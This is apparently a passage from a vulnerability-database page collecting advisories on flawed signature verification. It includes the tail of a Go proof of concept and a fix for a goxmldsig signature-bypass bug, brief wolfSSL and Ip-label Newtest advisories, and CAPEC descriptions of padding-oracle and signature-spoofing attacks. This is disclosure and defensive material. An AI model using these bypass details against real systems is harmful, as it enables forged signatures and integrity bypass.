c14n.Canonicalize(detachedSI)\n\tif err != nil {\n\t\tfmt.Println(\"c14n error:\", err)\n\t\treturn\n\t}\n\n\thash := signingCtx.Hash.New()\n\thash.Write(canonicalBytes)\n\tdigest := hash.Sum(nil)\n\n\trawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsigVal := sig.FindElement(\"./SignatureValue\")\n\tsigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))\n\n\tcertStore := \u0026dsig.MemoryX509CertificateStore{\n\t\tRoots: []*x509.Certificate{cert},\n\t}\n\tvalCtx := dsig.NewDefaultValidationContext(certStore)\n\n\troot.AddChild(sig)\n\n\tdoc.SetRoot(root)\n\tstr, _ := doc.WriteToString()\n\tfmt.Println(\"XML:\")\n\tfmt.Println(str)\n\n\tvalidated, err := valCtx.Validate(root)\n\tif err != nil {\n\t\tfmt.Println(\"validation failed:\", err)\n\t} else {\n\t\tfmt.Println(\"validation ok\")\n\t\tfmt.Println(\"validated text:\", validated.Text())\n\t}\n}\n``````\n\n-----\n\n### Impact\n\nThis vulnerability lets an attacker get around integrity checks for certain signed elements by replacing their content with the content from another element that is also referenced in the same signature.\n\n------\n\n### Remediation\n\nUpdate the loop to capture the value correctly or use the index to reference the slice directly.\n\n``````go\n// goxmldsig/validate.go\t\nfunc (ctx *ValidationContext) validateSignature(el *etree.Element, sig *types.Signature) error {\n\tvar ref *types.Reference\n\n  // OLD\n\t// for _, _ref := range signedInfo.References {\n\t// \tif _ref.URI == \"\" || _ref.URI[1:] == idAttr {\n\t// \t\tref = \u0026_ref\n\t// \t}\n\t// }\n\t\n  // FIX\n\tfor i := range signedInfo.References {\n\t\tif signedInfo.References[i].URI == \"\" ||\n\t\t\tsignedInfo.References[i].URI[1:] == idAttr {\n\t\t\tref = \u0026signedInfo.References[i]\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// ...\n}\n``````\n\n----\n\n### References\n\nhttps://cwe.mitre.org/data/definitions/347.html\n\nhttps://cwe.mitre.org/data/definitions/682.html\n\nhttps://github.com/russellhaering/goxmldsig/blob/main/validate.go\n\n-----\n\n**Author**: Tomas Illuminati",
  "id": "GHSA-479m-364c-43vc",
  "modified": "2026-03-27T20:58:00Z",
  "published": "2026-03-18T20:18:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33487"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/russellhaering/goxmldsig"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "validateSignature Loop Variable Capture Signature Bypass in goxmldsig"
}

GHSA-47QF-HP3H-RWMM

Vulnerability from github – Published: 2026-04-10 06:31 – Updated: 2026-04-29 15:30
VLAI
Details

wolfSSL's ECCSI signature verifier wc_VerifyEccsiHash decodes the r and s scalars from the signature blob via mp_read_unsigned_bin with no check that they lie in [1, q-1]. A crafted forged signature could verify against any message for any identity, using only publicly-known constants.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5466"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-10T04:17:16Z",
    "severity": "HIGH"
  },
  "details": "wolfSSL\u0027s ECCSI signature verifier `wc_VerifyEccsiHash` decodes the `r` and `s` scalars from the signature blob via `mp_read_unsigned_bin` with no check that they lie in `[1, q-1]`. A crafted forged signature could verify against any message for any identity, using only publicly-known constants.",
  "id": "GHSA-47qf-hp3h-rwmm",
  "modified": "2026-04-29T15:30:36Z",
  "published": "2026-04-10T06:31:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5466"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wolfssl/wolfssl/pull/10102"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-4847-3CW5-45XM

Vulnerability from github – Published: 2023-01-30 18:30 – Updated: 2023-02-06 21:30
VLAI
Details

The Robot application in Ip-label Newtest before v8.5R0 was discovered to use weak signature checks on executed binaries, allowing attackers to have write access and escalate privileges via replacing NEWTESTREMOTEMANAGER.EXE.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-23334"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-30T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The Robot application in Ip-label Newtest before v8.5R0 was discovered to use weak signature checks on executed binaries, allowing attackers to have write access and escalate privileges via replacing NEWTESTREMOTEMANAGER.EXE.",
  "id": "GHSA-4847-3cw5-45xm",
  "modified": "2023-02-06T21:30:30Z",
  "published": "2023-01-30T18:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23334"
    },
    {
      "type": "WEB",
      "url": "https://www.on-x.com/wp-content/uploads/2023/01/ON-X-Security-Advisory-Ip-label-Ekara-Newtest-CVE-2022-23334.pdf"
    },
    {
      "type": "WEB",
      "url": "http://ip-label.com"
    },
    {
      "type": "WEB",
      "url": "http://newtest.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-475: Signature Spoofing by Improper Validation

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.